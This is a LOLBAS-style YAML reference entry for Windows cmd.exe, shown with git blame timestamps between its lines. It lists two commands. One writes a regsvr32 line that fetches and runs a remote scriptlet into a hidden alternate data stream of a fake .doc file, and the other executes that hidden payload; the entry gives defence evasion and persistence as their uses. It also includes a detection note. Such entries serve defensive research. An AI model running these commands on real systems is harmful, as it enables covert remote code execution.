2019-06-27 13:40:03 +02:00
|
|
|
---
|
2019-06-26 12:33:11 +02:00
|
|
|
Name: Cmd.exe
|
|
|
|
|
Description: The command-line interpreter in Windows
|
|
|
|
|
Author: 'Ye Yint Min Thu Htut'
|
2021-01-10 16:04:52 +01:00
|
|
|
Created: 2019-06-26
|
2019-06-26 12:33:11 +02:00
|
|
|
Commands:
|
2021-07-06 19:56:24 +02:00
|
|
|
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
2019-06-27 13:40:03 +02:00
|
|
|
Description: Add content to an Alternate Data Stream (ADS).
|
|
|
|
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
|
|
|
|
Category: ADS
|
|
|
|
|
Privileges: User
|
2021-11-05 19:58:26 +01:00
|
|
|
MitreID: T1059.003
|
2019-06-27 13:40:03 +02:00
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
|
|
|
- Command: cmd.exe - < fakefile.doc:payload.bat
|
|
|
|
|
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
|
2019-06-26 12:33:11 +02:00
|
|
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
|
|
|
|
Category: ADS
|
|
|
|
|
Privileges: User
|
2021-11-05 19:58:26 +01:00
|
|
|
MitreID: T1059.003
|
2019-06-26 12:33:11 +02:00
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
|
|
|
Full_Path:
|
|
|
|
|
- Path: C:\Windows\System32\cmd.exe
|
|
|
|
|
- Path: C:\Windows\SysWOW64\cmd.exe
|
2021-01-10 16:04:52 +01:00
|
|
|
Code_Sample:
|
2019-06-26 12:33:11 +02:00
|
|
|
- Code:
|
|
|
|
|
Detection:
|
|
|
|
|
- IOC: cmd.exe executing files from alternate data streams.
|
|
|
|
|
Resources:
|
|
|
|
|
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
|
|
|
|
|
Acknowledgement:
|
|
|
|
|
- Person: r0lan
|
|
|
|
|
Handle: '@yeyint_mth'
|
|
|
|
|
---
|
